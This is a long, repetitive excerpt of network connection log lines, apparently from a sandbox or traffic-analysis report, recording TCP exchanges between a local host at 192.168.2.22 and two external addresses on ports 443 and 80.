                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
                  Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global traffic | TCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49166
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
                  Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
                  Source: global trafficTCP traffic: 142.93.65.161:80 -> 192.168.2.22:49168
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.93.65.161:80
